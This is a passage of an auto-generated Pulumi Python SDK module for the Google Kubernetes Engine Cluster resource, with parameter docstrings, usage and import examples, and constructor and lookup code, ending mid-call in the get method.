:param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
:param pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']] resource_usage_export_config: Configuration for the
[ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
Structure is documented below.
:param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
subnetwork in which the cluster's instances are launched.
:param pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
Structure is documented below.
:param pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
[Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
Structure is documented below.
"""
...
@overload
def __init__(__self__,
             resource_name: str,
             args: Optional[ClusterArgs] = None,
             opts: Optional[pulumi.ResourceOptions] = None):
    """
    Manages a Google Kubernetes Engine (GKE) cluster. For more information see
    [the official documentation](https://cloud.google.com/container-engine/docs/clusters)
    and [the API reference](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters).
    > **Note:** All arguments and attributes, including basic auth username and
    passwords as well as certificate outputs will be stored in the raw state as
    plaintext. [Read more about secrets in state](https://www.pulumi.com/docs/intro/concepts/programming-model/#secrets).
    ## Example Usage
    ### With A Separately Managed Node Pool (Recommended)
    ```python
    import pulumi
    import pulumi_gcp as gcp
    default = gcp.service_account.Account("default",
        account_id="service-account-id",
        display_name="Service Account")
    primary = gcp.container.Cluster("primary",
        location="us-central1",
        remove_default_node_pool=True,
        initial_node_count=1)
    primary_preemptible_nodes = gcp.container.NodePool("primaryPreemptibleNodes",
        location="us-central1",
        cluster=primary.name,
        node_count=1,
        node_config=gcp.container.NodePoolNodeConfigArgs(
            preemptible=True,
            machine_type="e2-medium",
            service_account=default.email,
            oauth_scopes=["https://www.googleapis.com/auth/cloud-platform"],
        ))
    ```
    > **Note:** It is recommended that node pools be created and managed as separate resources as in the example above.
    This allows node pools to be added and removed without recreating the cluster. Node pools defined directly in the
    `container.Cluster` resource cannot be removed without re-creating the cluster.
    ### Autopilot
    ```python
    import pulumi
    import pulumi_gcp as gcp
    default = gcp.service_account.Account("default",
        account_id="service-account-id",
        display_name="Service Account")
    primary = gcp.container.Cluster("primary",
        enable_autopilot=True,
        location="us-central1-a")
    ```
    ## Import
    GKE clusters can be imported using the `project`, `location`, and `name`. If the project is omitted, the default provider value will be used. Examples:
    ```sh
     $ pulumi import gcp:container/cluster:Cluster mycluster projects/my-gcp-project/locations/us-east1-a/clusters/my-cluster
    ```
    ```sh
     $ pulumi import gcp:container/cluster:Cluster mycluster my-gcp-project/us-east1-a/my-cluster
    ```
    ```sh
     $ pulumi import gcp:container/cluster:Cluster mycluster us-east1-a/my-cluster
    ```
    For example, the following fields will show diffs if set in config: `min_master_version`, `remove_default_node_pool`.

    :param str resource_name: The name of the resource.
    :param ClusterArgs args: The arguments to use to populate this resource's properties.
    :param pulumi.ResourceOptions opts: Options for the resource.
    """
    ...
def __init__(__self__, resource_name: str, *args, **kwargs):
    """
    Create a Cluster resource.

    Accepts either the positional ``ClusterArgs`` bundle form or the plain
    keyword-argument form, normalizes the two, and forwards to
    ``_internal_init``.
    """
    resource_args, opts = _utilities.get_resource_args_opts(ClusterArgs, pulumi.ResourceOptions, *args, **kwargs)
    if resource_args is None:
        # Keyword-argument form: pass everything straight through.
        __self__._internal_init(resource_name, *args, **kwargs)
    else:
        # ClusterArgs form: expand the args object into keyword arguments.
        __self__._internal_init(resource_name, opts, **resource_args.__dict__)
def _internal_init(__self__,
                   resource_name: str,
                   opts: Optional[pulumi.ResourceOptions] = None,
                   addons_config: Optional[pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']]] = None,
                   authenticator_groups_config: Optional[pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']]] = None,
                   cluster_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']]] = None,
                   cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
                   cluster_telemetry: Optional[pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']]] = None,
                   confidential_nodes: Optional[pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']]] = None,
                   database_encryption: Optional[pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']]] = None,
                   datapath_provider: Optional[pulumi.Input[str]] = None,
                   default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
                   default_snat_status: Optional[pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']]] = None,
                   description: Optional[pulumi.Input[str]] = None,
                   dns_config: Optional[pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']]] = None,
                   enable_autopilot: Optional[pulumi.Input[bool]] = None,
                   enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
                   enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
                   enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
                   enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
                   enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
                   enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
                   enable_tpu: Optional[pulumi.Input[bool]] = None,
                   identity_service_config: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']]] = None,
                   initial_node_count: Optional[pulumi.Input[int]] = None,
                   ip_allocation_policy: Optional[pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']]] = None,
                   location: Optional[pulumi.Input[str]] = None,
                   logging_config: Optional[pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']]] = None,
                   logging_service: Optional[pulumi.Input[str]] = None,
                   maintenance_policy: Optional[pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']]] = None,
                   master_auth: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']]] = None,
                   master_authorized_networks_config: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']]] = None,
                   min_master_version: Optional[pulumi.Input[str]] = None,
                   monitoring_config: Optional[pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']]] = None,
                   monitoring_service: Optional[pulumi.Input[str]] = None,
                   name: Optional[pulumi.Input[str]] = None,
                   network: Optional[pulumi.Input[str]] = None,
                   network_policy: Optional[pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']]] = None,
                   networking_mode: Optional[pulumi.Input[str]] = None,
                   node_config: Optional[pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']]] = None,
                   node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
                   node_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]]] = None,
                   node_version: Optional[pulumi.Input[str]] = None,
                   notification_config: Optional[pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']]] = None,
                   pod_security_policy_config: Optional[pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']]] = None,
                   private_cluster_config: Optional[pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']]] = None,
                   private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
                   project: Optional[pulumi.Input[str]] = None,
                   release_channel: Optional[pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']]] = None,
                   remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
                   resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
                   resource_usage_export_config: Optional[pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']]] = None,
                   subnetwork: Optional[pulumi.Input[str]] = None,
                   vertical_pod_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']]] = None,
                   workload_identity_config: Optional[pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']]] = None,
                   __props__=None):
    """
    Shared initializer backing both ``__init__`` overloads.

    Validates the resource options, builds a ``ClusterArgs`` property bag from
    the supplied inputs, and registers the resource with the Pulumi engine.

    :raises TypeError: if ``opts`` is not a ``pulumi.ResourceOptions`` or if
        ``__props__`` is supplied without ``opts.id``.
    """
    # Normalize and validate resource options.
    if opts is None:
        opts = pulumi.ResourceOptions()
    if not isinstance(opts, pulumi.ResourceOptions):
        raise TypeError('Expected resource options to be a ResourceOptions instance')
    if opts.version is None:
        opts.version = _utilities.get_version()
    # Only build a fresh property bag when creating a new resource; a lookup
    # of an existing resource (opts.id set) arrives with __props__ prebuilt.
    if opts.id is None:
        if __props__ is not None:
            raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
        __props__ = ClusterArgs.__new__(ClusterArgs)
        # Copy every user-supplied input property onto the property bag.
        input_props = {
            "addons_config": addons_config,
            "authenticator_groups_config": authenticator_groups_config,
            "cluster_autoscaling": cluster_autoscaling,
            "cluster_ipv4_cidr": cluster_ipv4_cidr,
            "cluster_telemetry": cluster_telemetry,
            "confidential_nodes": confidential_nodes,
            "database_encryption": database_encryption,
            "datapath_provider": datapath_provider,
            "default_max_pods_per_node": default_max_pods_per_node,
            "default_snat_status": default_snat_status,
            "description": description,
            "dns_config": dns_config,
            "enable_autopilot": enable_autopilot,
            "enable_binary_authorization": enable_binary_authorization,
            "enable_intranode_visibility": enable_intranode_visibility,
            "enable_kubernetes_alpha": enable_kubernetes_alpha,
            "enable_l4_ilb_subsetting": enable_l4_ilb_subsetting,
            "enable_legacy_abac": enable_legacy_abac,
            "enable_shielded_nodes": enable_shielded_nodes,
            "enable_tpu": enable_tpu,
            "identity_service_config": identity_service_config,
            "initial_node_count": initial_node_count,
            "ip_allocation_policy": ip_allocation_policy,
            "location": location,
            "logging_config": logging_config,
            "logging_service": logging_service,
            "maintenance_policy": maintenance_policy,
            "master_auth": master_auth,
            "master_authorized_networks_config": master_authorized_networks_config,
            "min_master_version": min_master_version,
            "monitoring_config": monitoring_config,
            "monitoring_service": monitoring_service,
            "name": name,
            "network": network,
            "network_policy": network_policy,
            "networking_mode": networking_mode,
            "node_config": node_config,
            "node_locations": node_locations,
            "node_pools": node_pools,
            "node_version": node_version,
            "notification_config": notification_config,
            "pod_security_policy_config": pod_security_policy_config,
            "private_cluster_config": private_cluster_config,
            "private_ipv6_google_access": private_ipv6_google_access,
            "project": project,
            "release_channel": release_channel,
            "remove_default_node_pool": remove_default_node_pool,
            "resource_labels": resource_labels,
            "resource_usage_export_config": resource_usage_export_config,
            "subnetwork": subnetwork,
            "vertical_pod_autoscaling": vertical_pod_autoscaling,
            "workload_identity_config": workload_identity_config,
        }
        for prop_name, prop_value in input_props.items():
            __props__.__dict__[prop_name] = prop_value
        # Output-only properties start unset; the engine fills them in.
        for output_prop in ("endpoint", "label_fingerprint", "master_version",
                            "operation", "self_link", "services_ipv4_cidr",
                            "tpu_ipv4_cidr_block"):
            __props__.__dict__[output_prop] = None
    super(Cluster, __self__).__init__(
        'gcp:container/cluster:Cluster',
        resource_name,
        __props__,
        opts)
@staticmethod
def get(resource_name: str,
        id: pulumi.Input[str],
        opts: Optional[pulumi.ResourceOptions] = None,
        addons_config: Optional[pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']]] = None,
        authenticator_groups_config: Optional[pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']]] = None,
        cluster_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']]] = None,
        cluster_ipv4_cidr: Optional[pulumi.Input[str]] = None,
        cluster_telemetry: Optional[pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']]] = None,
        confidential_nodes: Optional[pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']]] = None,
        database_encryption: Optional[pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']]] = None,
        datapath_provider: Optional[pulumi.Input[str]] = None,
        default_max_pods_per_node: Optional[pulumi.Input[int]] = None,
        default_snat_status: Optional[pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']]] = None,
        description: Optional[pulumi.Input[str]] = None,
        dns_config: Optional[pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']]] = None,
        enable_autopilot: Optional[pulumi.Input[bool]] = None,
        enable_binary_authorization: Optional[pulumi.Input[bool]] = None,
        enable_intranode_visibility: Optional[pulumi.Input[bool]] = None,
        enable_kubernetes_alpha: Optional[pulumi.Input[bool]] = None,
        enable_l4_ilb_subsetting: Optional[pulumi.Input[bool]] = None,
        enable_legacy_abac: Optional[pulumi.Input[bool]] = None,
        enable_shielded_nodes: Optional[pulumi.Input[bool]] = None,
        enable_tpu: Optional[pulumi.Input[bool]] = None,
        endpoint: Optional[pulumi.Input[str]] = None,
        identity_service_config: Optional[pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']]] = None,
        initial_node_count: Optional[pulumi.Input[int]] = None,
        ip_allocation_policy: Optional[pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']]] = None,
        label_fingerprint: Optional[pulumi.Input[str]] = None,
        location: Optional[pulumi.Input[str]] = None,
        logging_config: Optional[pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']]] = None,
        logging_service: Optional[pulumi.Input[str]] = None,
        maintenance_policy: Optional[pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']]] = None,
        master_auth: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']]] = None,
        master_authorized_networks_config: Optional[pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']]] = None,
        master_version: Optional[pulumi.Input[str]] = None,
        min_master_version: Optional[pulumi.Input[str]] = None,
        monitoring_config: Optional[pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']]] = None,
        monitoring_service: Optional[pulumi.Input[str]] = None,
        name: Optional[pulumi.Input[str]] = None,
        network: Optional[pulumi.Input[str]] = None,
        network_policy: Optional[pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']]] = None,
        networking_mode: Optional[pulumi.Input[str]] = None,
        node_config: Optional[pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']]] = None,
        node_locations: Optional[pulumi.Input[Sequence[pulumi.Input[str]]]] = None,
        node_pools: Optional[pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]]] = None,
        node_version: Optional[pulumi.Input[str]] = None,
        notification_config: Optional[pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']]] = None,
        operation: Optional[pulumi.Input[str]] = None,
        pod_security_policy_config: Optional[pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']]] = None,
        private_cluster_config: Optional[pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']]] = None,
        private_ipv6_google_access: Optional[pulumi.Input[str]] = None,
        project: Optional[pulumi.Input[str]] = None,
        release_channel: Optional[pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']]] = None,
        remove_default_node_pool: Optional[pulumi.Input[bool]] = None,
        resource_labels: Optional[pulumi.Input[Mapping[str, pulumi.Input[str]]]] = None,
        resource_usage_export_config: Optional[pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']]] = None,
        self_link: Optional[pulumi.Input[str]] = None,
        services_ipv4_cidr: Optional[pulumi.Input[str]] = None,
        subnetwork: Optional[pulumi.Input[str]] = None,
        tpu_ipv4_cidr_block: Optional[pulumi.Input[str]] = None,
        vertical_pod_autoscaling: Optional[pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']]] = None,
        workload_identity_config: Optional[pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']]] = None) -> 'Cluster':
    """
    Get an existing Cluster resource's state with the given name, id, and optional extra
    properties used to qualify the lookup.

    :param str resource_name: The unique name of the resulting resource.
    :param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
    :param pulumi.ResourceOptions opts: Options for the resource.
    :param pulumi.Input[pulumi.InputType['ClusterAddonsConfigArgs']] addons_config: The configuration for addons supported by GKE.
           Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterAuthenticatorGroupsConfigArgs']] authenticator_groups_config: Configuration for the
           [Google Groups for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/role-based-access-control#groups-setup-gsuite) feature.
           Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterClusterAutoscalingArgs']] cluster_autoscaling: Per-cluster configuration of Node Auto-Provisioning with Cluster Autoscaler to
           automatically adjust the size of the cluster and create/delete node pools based
           on the current needs of the cluster's workload. See the
           [guide to using Node Auto-Provisioning](https://cloud.google.com/kubernetes-engine/docs/how-to/node-auto-provisioning)
           for more details. Structure is documented below.
    :param pulumi.Input[str] cluster_ipv4_cidr: The IP address range of the Kubernetes pods
           in this cluster in CIDR notation (e.g. `10.96.0.0/14`). Leave blank to have one
           automatically chosen or specify a `/14` block in `10.0.0.0/8`. This field will
           only work for routes-based clusters, where `ip_allocation_policy` is not defined.
    :param pulumi.Input[pulumi.InputType['ClusterClusterTelemetryArgs']] cluster_telemetry: Configuration for
           [ClusterTelemetry](https://cloud.google.com/monitoring/kubernetes-engine/installing#controlling_the_collection_of_application_logs) feature,
           Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterConfidentialNodesArgs']] confidential_nodes: Configuration for [Confidential Nodes](https://cloud.google.com/kubernetes-engine/docs/how-to/confidential-gke-nodes) feature. Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterDatabaseEncryptionArgs']] database_encryption: Structure is documented below.
    :param pulumi.Input[str] datapath_provider: The desired datapath provider for this cluster. By default, uses the IPTables-based kube-proxy implementation.
    :param pulumi.Input[int] default_max_pods_per_node: The default maximum number of pods
           per node in this cluster. This doesn't work on "routes-based" clusters, clusters
           that don't have IP Aliasing enabled. See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/how-to/flexible-pod-cidr)
           for more information.
    :param pulumi.Input[pulumi.InputType['ClusterDefaultSnatStatusArgs']] default_snat_status: [GKE SNAT](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-masquerade-agent#how_ipmasq_works) DefaultSnatStatus contains the desired state of whether default sNAT should be disabled on the cluster, [API doc](https://cloud.google.com/kubernetes-engine/docs/reference/rest/v1beta1/projects.locations.clusters#networkconfig). Structure is documented below
    :param pulumi.Input[str] description: Description of the cluster.
    :param pulumi.Input[pulumi.InputType['ClusterDnsConfigArgs']] dns_config: Configuration for [Using Cloud DNS for GKE](https://cloud.google.com/kubernetes-engine/docs/how-to/cloud-dns). Structure is documented below.
    :param pulumi.Input[bool] enable_autopilot: Enable Autopilot for this cluster. Defaults to `false`.
           Note that when this option is enabled, certain features of Standard GKE are not available.
           See the [official documentation](https://cloud.google.com/kubernetes-engine/docs/concepts/autopilot-overview#comparison)
           for available features.
    :param pulumi.Input[bool] enable_binary_authorization: Enable Binary Authorization for this cluster.
           If enabled, all container images will be validated by Google Binary Authorization.
    :param pulumi.Input[bool] enable_intranode_visibility: Whether Intra-node visibility is enabled for this cluster. This makes same node pod to pod traffic visible for VPC network.
    :param pulumi.Input[bool] enable_kubernetes_alpha: Whether to enable Kubernetes Alpha features for
           this cluster. Note that when this option is enabled, the cluster cannot be upgraded
           and will be automatically deleted after 30 days.
    :param pulumi.Input[bool] enable_l4_ilb_subsetting: Whether L4ILB Subsetting is enabled for this cluster.
    :param pulumi.Input[bool] enable_legacy_abac: Whether the ABAC authorizer is enabled for this cluster.
           When enabled, identities in the system, including service accounts, nodes, and controllers,
           will have statically granted permissions beyond those provided by the RBAC configuration or IAM.
           Defaults to `false`
    :param pulumi.Input[bool] enable_shielded_nodes: Enable Shielded Nodes features on all nodes in this cluster. Defaults to `true`.
    :param pulumi.Input[bool] enable_tpu: Whether to enable Cloud TPU resources in this cluster.
           See the [official documentation](https://cloud.google.com/tpu/docs/kubernetes-engine-setup).
    :param pulumi.Input[str] endpoint: The IP address of this cluster's Kubernetes master.
    :param pulumi.Input[pulumi.InputType['ClusterIdentityServiceConfigArgs']] identity_service_config: Structure is documented below.
    :param pulumi.Input[int] initial_node_count: The number of nodes to create in this
           cluster's default node pool. In regional or multi-zonal clusters, this is the
           number of nodes per zone. Must be set if `node_pool` is not set. If you're using
           `container.NodePool` objects with no default node pool, you'll need to
           set this to a value of at least `1`, alongside setting
           `remove_default_node_pool` to `true`.
    :param pulumi.Input[pulumi.InputType['ClusterIpAllocationPolicyArgs']] ip_allocation_policy: Configuration of cluster IP allocation for
           VPC-native clusters. Adding this block enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
           making the cluster VPC-native instead of routes-based. Structure is documented
           below.
    :param pulumi.Input[str] label_fingerprint: The fingerprint of the set of labels for this cluster.
    :param pulumi.Input[str] location: The location (region or zone) in which the cluster
           master will be created, as well as the default node location. If you specify a
           zone (such as `us-central1-a`), the cluster will be a zonal cluster with a
           single cluster master. If you specify a region (such as `us-west1`), the
           cluster will be a regional cluster with multiple masters spread across zones in
           the region, and with default node locations in those zones as well
    :param pulumi.Input[pulumi.InputType['ClusterLoggingConfigArgs']] logging_config: Logging configuration for the cluster.
           Structure is documented below.
    :param pulumi.Input[str] logging_service: The logging service that the cluster should
           write logs to. Available options include `logging.googleapis.com`(Legacy Stackdriver),
           `logging.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Logging), and `none`. Defaults to `logging.googleapis.com/kubernetes`
    :param pulumi.Input[pulumi.InputType['ClusterMaintenancePolicyArgs']] maintenance_policy: The maintenance policy to use for the cluster. Structure is
           documented below.
    :param pulumi.Input[pulumi.InputType['ClusterMasterAuthArgs']] master_auth: The authentication information for accessing the
           Kubernetes master. Some values in this block are only returned by the API if
           your service account has permission to get credentials for your GKE cluster. If
           you see an unexpected diff unsetting your client cert, ensure you have the
           `container.clusters.getCredentials` permission.
           Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterMasterAuthorizedNetworksConfigArgs']] master_authorized_networks_config: The desired
           configuration options for master authorized networks. Omit the
           nested `cidr_blocks` attribute to disallow external access (except
           the cluster node IPs, which GKE automatically whitelists).
           Structure is documented below.
    :param pulumi.Input[str] master_version: The current version of the master in the cluster. This may
           be different than the `min_master_version` set in the config if the master
           has been updated by GKE.
    :param pulumi.Input[str] min_master_version: The minimum version of the master. GKE
           will auto-update the master to new versions, so this does not guarantee the
           current master version--use the read-only `master_version` field to obtain that.
           If unset, the cluster's version will be set by GKE to the version of the most recent
           official release (which is not necessarily the latest version). Most users will find
           the `container.get_engine_versions` data source useful - it indicates which versions
           are available. If you intend to specify versions manually,
           [the docs](https://cloud.google.com/kubernetes-engine/versioning-and-upgrades#specifying_cluster_version)
           describe the various acceptable formats for this field.
    :param pulumi.Input[pulumi.InputType['ClusterMonitoringConfigArgs']] monitoring_config: Monitoring configuration for the cluster.
           Structure is documented below.
    :param pulumi.Input[str] monitoring_service: The monitoring service that the cluster
           should write metrics to.
           Automatically send metrics from pods in the cluster to the Google Cloud Monitoring API.
           VM metrics will be collected by Google Compute Engine regardless of this setting
           Available options include
           `monitoring.googleapis.com`(Legacy Stackdriver), `monitoring.googleapis.com/kubernetes`(Stackdriver Kubernetes Engine Monitoring), and `none`.
           Defaults to `monitoring.googleapis.com/kubernetes`
    :param pulumi.Input[str] name: The name of the cluster, unique within the project and
           location.
    :param pulumi.Input[str] network: The name or self_link of the Google Compute Engine
           network to which the cluster is connected. For Shared VPC, set this to the self link of the
           shared network.
    :param pulumi.Input[pulumi.InputType['ClusterNetworkPolicyArgs']] network_policy: Configuration options for the
           [NetworkPolicy](https://kubernetes.io/docs/concepts/services-networking/networkpolicies/)
           feature. Structure is documented below.
    :param pulumi.Input[str] networking_mode: Determines whether alias IPs or routes will be used for pod IPs in the cluster.
           Options are `VPC_NATIVE` or `ROUTES`. `VPC_NATIVE` enables [IP aliasing](https://cloud.google.com/kubernetes-engine/docs/how-to/ip-aliases),
           and requires the `ip_allocation_policy` block to be defined. By default when this field is unspecified, GKE will create a `ROUTES`-based cluster.
    :param pulumi.Input[pulumi.InputType['ClusterNodeConfigArgs']] node_config: Parameters used in creating the default node pool.
           Generally, this field should not be used at the same time as a
           `container.NodePool` or a `node_pool` block; this configuration
           manages the default node pool, which isn't recommended to be used.
           Structure is documented below.
    :param pulumi.Input[Sequence[pulumi.Input[str]]] node_locations: The list of zones in which the cluster's nodes
           are located. Nodes must be in the region of their regional cluster or in the
           same region as their cluster's zone for zonal clusters. If this is specified for
           a zonal cluster, omit the cluster's zone.
    :param pulumi.Input[Sequence[pulumi.Input[pulumi.InputType['ClusterNodePoolArgs']]]] node_pools: List of node pools associated with this cluster.
           See container.NodePool for schema.
           **Warning:** node pools defined inside a cluster can't be changed (or added/removed) after
           cluster creation without deleting and recreating the entire cluster. Unless you absolutely need the ability
           to say "these are the _only_ node pools associated with this cluster", use the
           container.NodePool resource instead of this property.
    :param pulumi.Input[str] node_version: The Kubernetes version on the nodes. Must either be unset
           or set to the same value as `min_master_version` on create. Defaults to the default
           version set by GKE which is not necessarily the latest version. This only affects
           nodes in the default node pool. While a fuzzy version can be specified, it's
           recommended that you specify explicit versions as the provider will see spurious diffs
           when fuzzy versions are used. See the `container.get_engine_versions` data source's
           `version_prefix` field to approximate fuzzy versions.
           To update nodes in other node pools, use the `version` attribute on the node pool.
    :param pulumi.Input[pulumi.InputType['ClusterNotificationConfigArgs']] notification_config: Configuration for the [cluster upgrade notifications](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-upgrade-notifications) feature. Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterPodSecurityPolicyConfigArgs']] pod_security_policy_config: ) Configuration for the
           [PodSecurityPolicy](https://cloud.google.com/kubernetes-engine/docs/how-to/pod-security-policies) feature.
           Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterPrivateClusterConfigArgs']] private_cluster_config: Configuration for [private clusters](https://cloud.google.com/kubernetes-engine/docs/how-to/private-clusters),
           clusters with private nodes. Structure is documented below.
    :param pulumi.Input[str] private_ipv6_google_access: The desired state of IPv6 connectivity to Google Services. By default, no private IPv6 access to or from Google Services (all access will be via IPv4).
    :param pulumi.Input[str] project: The ID of the project in which the resource belongs. If it
           is not provided, the provider project is used.
    :param pulumi.Input[pulumi.InputType['ClusterReleaseChannelArgs']] release_channel: Configuration options for the [Release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels)
           feature, which provide more control over automatic upgrades of your GKE clusters.
           When updating this field, GKE imposes specific version requirements. See
           [Selecting a new release channel](https://cloud.google.com/kubernetes-engine/docs/concepts/release-channels#selecting_a_new_release_channel)
           for more details; the `container.get_engine_versions` datasource can provide
           the default version for a channel. Note that removing the `release_channel`
           field from your config will cause the provider to stop managing your cluster's
           release channel, but will not unenroll it. Instead, use the `"UNSPECIFIED"`
           channel. Structure is documented below.
    :param pulumi.Input[bool] remove_default_node_pool: If `true`, deletes the default node
           pool upon cluster creation. If you're using `container.NodePool`
           resources with no default node pool, this should be set to `true`, alongside
           setting `initial_node_count` to at least `1`.
    :param pulumi.Input[Mapping[str, pulumi.Input[str]]] resource_labels: The GCE resource labels (a map of key/value pairs) to be applied to the cluster.
    :param pulumi.Input[pulumi.InputType['ClusterResourceUsageExportConfigArgs']] resource_usage_export_config: Configuration for the
           [ResourceUsageExportConfig](https://cloud.google.com/kubernetes-engine/docs/how-to/cluster-usage-metering) feature.
           Structure is documented below.
    :param pulumi.Input[str] self_link: The server-defined URL for the resource.
    :param pulumi.Input[str] services_ipv4_cidr: The IP address range of the Kubernetes services in this
           cluster, in [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
           notation (e.g. `1.2.3.4/29`). Service addresses are typically put in the last
           `/16` from the container CIDR.
    :param pulumi.Input[str] subnetwork: The name or self_link of the Google Compute Engine
           subnetwork in which the cluster's instances are launched.
    :param pulumi.Input[str] tpu_ipv4_cidr_block: The IP address range of the Cloud TPUs in this cluster, in
           [CIDR](http://en.wikipedia.org/wiki/Classless_Inter-Domain_Routing)
           notation (e.g. `1.2.3.4/29`).
    :param pulumi.Input[pulumi.InputType['ClusterVerticalPodAutoscalingArgs']] vertical_pod_autoscaling: Vertical Pod Autoscaling automatically adjusts the resources of pods controlled by it.
           Structure is documented below.
    :param pulumi.Input[pulumi.InputType['ClusterWorkloadIdentityConfigArgs']] workload_identity_config: Workload Identity allows Kubernetes service accounts to act as a user-managed
           [Google IAM Service Account](https://cloud.google.com/iam/docs/service-accounts#user-managed_service_accounts).
           Structure is documented below.
    """
    # Attach the provider ID to the resource options so the engine performs a
    # lookup of existing state instead of a create.
    opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
    # Build the state bag without running _ClusterState.__init__ (which would
    # re-validate inputs); attributes are written directly into its __dict__.
    __props__ = _ClusterState.__new__(_ClusterState)
    # Single ordered update — keyword names match the _ClusterState attribute
    # names one-for-one, preserving the same insertion order as individual
    # assignments would.
    __props__.__dict__.update(
        addons_config=addons_config,
        authenticator_groups_config=authenticator_groups_config,
        cluster_autoscaling=cluster_autoscaling,
        cluster_ipv4_cidr=cluster_ipv4_cidr,
        cluster_telemetry=cluster_telemetry,
        confidential_nodes=confidential_nodes,
        database_encryption=database_encryption,
        datapath_provider=datapath_provider,
        default_max_pods_per_node=default_max_pods_per_node,
        default_snat_status=default_snat_status,
        description=description,
        dns_config=dns_config,
        enable_autopilot=enable_autopilot,
